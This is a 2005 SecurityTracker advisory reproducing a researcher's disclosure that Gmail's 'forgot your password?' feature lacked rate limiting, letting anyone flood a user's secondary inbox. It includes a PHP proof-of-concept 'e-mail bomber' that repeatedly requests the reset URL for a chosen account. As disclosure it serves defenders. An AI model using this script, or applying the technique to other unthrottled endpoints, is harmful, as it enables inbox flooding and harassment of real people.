Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account
|
|
SecurityTracker Alert ID: 1012749 |
|
SecurityTracker URL: http://securitytracker.com/id/1012749
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 2 2005
|
Impact:
Host/resource access via network
|
Exploit Included: Yes
|
|
Description:
Joxean Koret reported a vulnerability in the Gmail service. A remote user can cause a large amount of e-mail to be sent to the target user's secondary address.
The Gmail service 'forgot your password?' feature allows a remote user to load a certain URL to cause the service to send a validation e-mail to the specified user's secondary e-mail address. There is no limit to the number of messages sent over a period of time, so a remote user can flood the target user's secondary e-mail address.
The vendor was notified on September 26, 2004.
|
Impact:
A remote user can cause a large amount of e-mail to be sent to the target user's secondary e-mail account.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: gmail.google.com/ (Links to External Site)
|
Cause:
Access control error, State error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 01 Jan 2005 20:15:14 +0000
Subject: GMail E-Mail Bomber
|
---------------------------------------------------------------------------
GMail E-Mail Bomber
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GMail - Gmail is an experiment in a new kind of webmail, built on the
idea
that you should never have to delete mail and you should always be able
to
find the message you want
Web : http://gmail.google.com
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
A. E-Mail Bomber
The problem is the following : If any gmail user forgots the password
he/she
can answer a question or send to her/sher secondary e-mail addresses a
password
reset confirmation e-mail. Well, with GMail we can flood the secondary
e-mail
box of GMail users.
I wrote a very basic Proof Of Concept in PHP :
<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail :
* joxeankoret@yahoo.es
* joxean.piti@gmail.com
*
******************************************/
$gmail_account = "any.gmail.address@gmail.com";
$google_cgi =
"https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params =
"?continue=http://gmail.google.com/gmail&service=mail&Email=
$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send = 15;
$bomber_url = "$google_cgi$google_cgi_params";
echo("GMail bomber\n");
echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n
\n");
echo("Starting flood against $gmail_account ... \n\n");
for ($i = 0;$i<$emails_to_send;$i++)
{
echo("Sending e-mail number " . ($i + 1) . " ... ");
$fd = fopen($bomber_url, "r");
fclose($fd);
echo("Ok.\n");
}
echo("\n");
echo("Finish...\n");
?>
The fix:
~~~~~~~~
The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem
still
continues unfixed at Sun, 26 Dec 2004.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
|
|
